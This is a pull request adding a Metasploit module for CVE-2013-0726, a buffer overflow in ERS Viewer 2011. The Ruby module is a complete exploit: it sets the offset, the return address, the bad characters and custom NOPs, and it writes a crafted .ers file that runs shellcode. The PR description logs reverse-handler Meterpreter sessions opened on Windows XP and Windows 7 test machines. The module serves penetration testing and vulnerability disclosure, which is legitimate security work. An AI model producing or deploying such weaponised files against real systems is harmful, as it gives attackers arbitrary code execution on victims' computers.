### PR TITLE
Add module for CVE-2013-0726

### DIFF
--- a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb
+++ b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb
@@ -1,0 +1,99 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::FILEFORMAT
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "ERS Viewer 2011 ERS File Handling Buffer Overflow",
+			'Description'    => %q{
+					This module exploits a buffer overflow vulnerability found in ERS Viewer 2011
+				(version 11.04). The vulnerability exists in the module ermapper_u.dll where the
+				function ERM_convert_to_correct_webpath handles user provided data in a insecure
+				way. It results in arbitrary code execution under the context of the user viewing
+				a specially crafted .ers file. This module has been tested successfully with ERS
+				Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Parvez Anwar', # Vulnerability Discovery
+					'juan vazquez' # Metasploit
+				],
+			'References'     =>
+				[
+					[ 'CVE', '2013-0726' ],
+					[ 'OSVDB', '92694' ],
+					[ 'BID', '59379' ],
+					[ 'URL', 'http://secunia.com/advisories/51725/' ]
+				],
+			'Payload'        =>
+				{
+					'Space'    => 7516,
+					'BadChars' => "\x22\x5c" +
+						(0x7f..0xff).to_a.pack("C*") +
+						(0x00..0x08).to_a.pack("C*") +
+						(0x0a..0x1f).to_a.pack("C*"),
+					'DisableNops' => true,
+					'EncoderOptions' =>
+						{
+							'BufferRegister' => 'ESP'
+						}
+				},
+			'SaveRegisters'  => [ 'ESP' ],
+			'DefaultOptions'  =>
+				{
+					'ExitFunction' => "process",
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'ERS Viewer 2011 (v11.04)  / Windows XP SP3 / Windows 7 SP1',
+						{
+							'Offset' => 260,
+							'Ret' => 0x67097d7a # push esp # ret 0x08 from QtCore4.dll
+						}
+					],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Apr 23 2013",
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('FILENAME', [ true, 'The file name.',  'msf.ers']),
+			], self.class)
+
+	end
+
+	# Rewrote it because make_nops is ignoring SaveRegisters
+	# and corrupting ESP.
+	def make_nops(count)
+		return "\x43" * count # 0x43 => inc ebx
+	end
+
+	def exploit
+
+		buf = rand_text(target['Offset'])
+		buf << [target.ret].pack("V")
+		buf << make_nops(8) # In order to keep ESP pointing to the start of the shellcode
+		buf << payload.encoded
+
+		ers = %Q|
+DatasetHeader Begin
+	Name		= "#{buf}"
+DatasetHeader End
+		|
+
+		file_create(ers)
+	end
+end


### PR DESCRIPTION
Vulnerable software: ERS Viewer 2011, version 11.04, can be found here:

http://geospatial.intergraph.com/resources/downloads/download/ERDAS_ER_Viewer_2011_Version_11_0_4.aspx?Downloads=ProductDownloadItem 

Test on Windows XP SP3 and W7 SP1:

```
msf exploit(erdas_er_viewer_bof) > rexploit
[*] Reloading module...

[+] msf.ers stored at /Users/juan/.msf4/local/msf.ers
msf exploit(erdas_er_viewer_bof) > use exploit/multi/handler 
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 10.6.0.165:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:51547) at 2013-05-08 13:21:45 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 10.6.0.165:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 3 opened (10.6.0.165:4444 -> 10.6.0.165:51690) at 2013-05-08 13:36:22 -0500

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
emeterpreter > exit -y
[*] Shutting down Meterpreter...

```
